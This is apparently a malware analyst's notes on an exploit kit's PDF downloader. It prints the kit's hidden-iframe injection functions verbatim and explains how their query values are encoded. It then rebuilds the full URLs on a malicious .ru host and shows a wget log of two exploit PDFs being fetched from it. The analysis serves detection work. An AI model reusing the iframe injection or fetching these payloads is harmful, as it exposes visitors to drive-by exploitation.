- // There are two PDF downloader functions, p1() & p2()
- // let's fetch what they point to...
- // p1: captured kit code, kept verbatim as evidence. It builds a <div>, sets its
- // innerHTML to an <iframe>, and appends it to document.body so the browser
- // requests the iframe URL.
- // The src is the root-relative path /forum/links/column.php, so the request goes
- // to whichever host served this script (delemiator.ru:8080 in the log below).
- // Query parameters, as built on the innerHTML line:
- //   loh      = x("c833f")
- //   gggijbpx = x("occ")
- //   xtppbw   = fixed literal 2v:1k:1m:32:33:1k:1k:31:1j:1o
- //   jbu      = x(pdfver.join("."))  -- the detected PDF version, dot-joined
- // x() and pdfver are defined outside this block.
- // NOTE(review): parameter names differ between p1() and p2(), so they look
- // randomised -- for detection, match on the path and the colon-separated value
- // shape rather than on the names. Confirm against other samples.
- function p1()
- {
- var d=document.createElement("div");
- d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
- document.body.appendChild(d);
- }
- // p2: captured kit code, kept verbatim as evidence. Same mechanism as p1():
- // a <div> whose innerHTML is an <iframe> is appended to document.body.
- // It targets the same /forum/links/column.php endpoint, with different
- // parameter names and a different second value:
- //   olnvlwxj = x("c833f")
- //   xdhhdvud = x("c")               -- p1() sends x("occ") in this position
- //   hgzmul   = fixed literal 2v:1k:1m:32:33:1k:1k:31:1j:1o
- //   ohu      = x(pdfver.join("."))  -- the detected PDF version, dot-joined
- // x() and pdfver are defined outside this block.
- // In the download log below this URL returned a different, smaller PDF than the
- // p1() URL (14,769 vs 27,836 bytes).
- function p2()
- {
- var d=document.createElement("div");
- d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
- document.body.appendChild(d);
- }
- // The two IFRAMEs above (↑) point to URLs built with the function x() from PluginDetect.
- // Feed "c833f", "occ" and "c" through x() to get the parameter values,
- // in this case "30:1n:1i:1i:33", "3c:30:30" and "30".
- // PS: the last parameter asks for the PDF version; use whatever value you want there, e.g. the above
- // pdfver=[5,0,1,0] is joined into the string "5.0.1.0"; put that through x() and it comes out as 1k:1d:1f:1d:1g:1d:1f
- //
- //Note, my memo code:
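/**
 * Analyst's memo copy of the x() encoder that p1()/p2() use to build their
 * query-string values.
 *
 * Each UTF-16 code unit of `s` is written in base 33, and the pieces are
 * joined with ":". Example: x("occ") === "3c:30:30".
 *
 * @param {string} s - Text to encode.
 * @returns {string} Colon-separated base-33 code units; "" for empty input.
 */
function x(s) {
  // Locals are declared here; the original leaked d, i and k as implicit globals.
  const parts = [];
  for (let i = 0; i < s.length; i++) {
    parts.push(s.charCodeAt(i).toString(33));
  }
  return parts.join(":");
}

// Replace the argument with "c833f", "c" or "5.0.1.0" to get the other values.
const a = x("occ");

// Print the result instead of eval()-ing it: the encoded string is data, not
// JavaScript ("3c:30:30" is a SyntaxError under eval), and when working with
// strings taken from a hostile page eval should be swapped for a print anyway.
console.log(a);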
- // In short, substituting the encoded strings into the URL gives the download URLs below:
- http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
- http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
- // Proof that this works: the download log of the exploit-downloader PDFs fetched from those URLs:
- --17:14:11-- http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
- => `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
- Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
- Connecting to delemiator.ru|202.180.221.186|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 27,836 (27K) [application/pdf]
- 17:14:16 (16.21 KB/s) - `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [27836/27836]
- --17:16:32-- http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
- => `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
- Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
- Connecting to delemiator.ru|203.80.16.81|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 14,769 (14K) [application/pdf]
- 17:16:35 (66.79 KB/s) - `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [14769/14769]